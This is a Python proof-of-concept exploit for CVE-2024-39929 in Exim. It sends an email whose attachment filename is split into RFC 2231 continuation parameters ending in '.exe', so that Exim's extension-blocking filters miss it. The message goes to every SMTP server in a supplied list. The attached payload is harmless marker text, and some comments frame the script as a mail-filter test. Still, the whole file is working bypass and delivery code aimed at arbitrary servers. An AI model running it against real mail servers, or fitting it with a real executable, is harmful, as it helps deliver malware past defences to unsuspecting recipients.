CVE-2024-39929_POC.py
# Exploit Title: Exim - CVE-2024-39929 - POC
# Date: 07/29/2024
# Exploit Author: Michael Fry
# Vendor Homepage: https://www.exim.org/
# Software Link: https://github.com/michael-david-fry/CVE-2024-39929
# Version: <= 4.97.1
# Tested on: Kali Linux
# CVE: CVE-2024-39929
import smtplib
import argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
def send_exploit_email(smtp_server, smtp_port, sender_email, recipient_email):
    """Send one test message whose attachment name uses RFC 2231 continuations.

    The message carries the same harmless text twice: once as the plain
    body and once as a base64-encoded ``application/octet-stream`` part.
    The attachment's Content-Disposition spreads its filename over the
    ``filename*0`` / ``filename*1`` / ``filename*2`` parameters, the last
    piece being ``.exe``. CVE-2024-39929 concerns Exim (the file header
    lists versions <= 4.97.1) misparsing such a multi-part filename, so
    that ``$mime_filename`` extension-blocking rules do not see the real
    extension.

    For mail-filter review: the pattern to match is a Content-Disposition
    with numbered ``filename*N`` parameters whose joined value ends in a
    blocked extension. This function only reports that the SMTP
    transaction completed; whether the filter stopped the message has to
    be checked on the receiving side.

    Args:
        smtp_server: Host name or address of the SMTP server under test.
        smtp_port: TCP port to connect to.
        sender_email: Envelope sender and ``From`` header value.
        recipient_email: Envelope recipient and ``To`` header value.

    Returns:
        None. Any exception is caught and printed rather than raised.
    """
    try:
        # Benign marker text; nothing executable is transmitted.
        payload = 'This is a CVE-2024-39929 test.'

        message = MIMEMultipart()
        header_fields = (
            ('Subject', f'Exploit CVE-2024-39929 Test through {smtp_server}'),
            ('From', sender_email),
            ('To', recipient_email),
        )
        for field_name, field_value in header_fields:
            message[field_name] = field_value

        # Plain-text body part.
        message.attach(MIMEText(payload, 'plain'))

        # Attachment part holding the same marker text, base64-encoded.
        part = MIMEBase('application', 'octet-stream')
        part.set_payload(payload)
        encoders.encode_base64(part)

        # Filename split into three RFC 2231 continuation pieces; only the
        # last piece carries the extension a filter would want to block.
        disposition = 'attachment; filename*0="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*2=".exe"'
        part.add_header('Content-Disposition', disposition)
        message.attach(part)

        with smtplib.SMTP(smtp_server, smtp_port) as session:
            # Debug level 1 makes smtplib print the SMTP dialogue.
            session.set_debuglevel(1)
            session.ehlo()

            # Opportunistic TLS: upgrade only when the server offers it.
            # NOTE(review): no SSL context is passed to starttls(), so
            # certificate checking is left to smtplib's default - confirm
            # that is acceptable for the test environment.
            if session.has_extn('STARTTLS'):
                session.starttls()
                # Capabilities must be re-read after the TLS upgrade.
                session.ehlo()

            session.sendmail(sender_email, [recipient_email], message.as_string())
            print(f"Exploit email sent to {smtp_server}")
    except Exception as exc:
        # Best effort: report the failure so the caller's loop can go on.
        print(f"Error sending email to {smtp_server}: {exc}")
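def read_servers_from_file(file_path):
    """Return the non-blank lines of *file_path* with whitespace trimmed.

    Each remaining line is treated by the caller as one SMTP server name.
    The file is decoded as UTF-8 explicitly so the result does not depend
    on the locale's default encoding.

    Args:
        file_path: Path to a text file with one server per line.

    Returns:
        A list of stripped, non-empty lines in file order.

    Raises:
        OSError: If the file cannot be opened.
    """
    with open(file_path, 'r', encoding='utf-8') as file:
        # Strip once per line, then drop the lines that end up empty.
        stripped_lines = (line.strip() for line in file)
        return [entry for entry in stripped_lines if entry]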
def main():
    """Read a server list and send the test message to each entry.

    The list file path comes from the command line. The sender and
    recipient addresses are prompted for once and reused for every
    server. Every connection is made to port 25.
    """
    cli = argparse.ArgumentParser(description="Send exploit email to a list of SMTP servers.")
    cli.add_argument('file_path', help='Path to the file containing the list of SMTP servers')
    options = cli.parse_args()

    # Addresses are asked for before the list file is opened.
    sender_email = input("Enter the sender email address: ")
    recipient_email = input("Enter the recipient email address: ")

    for smtp_server in read_servers_from_file(options.file_path):
        print(f"\nConnecting to {smtp_server}...")
        # Failures are reported inside the call, so the loop carries on.
        send_exploit_email(smtp_server, 25, sender_email, recipient_email)


if __name__ == "__main__":
    main()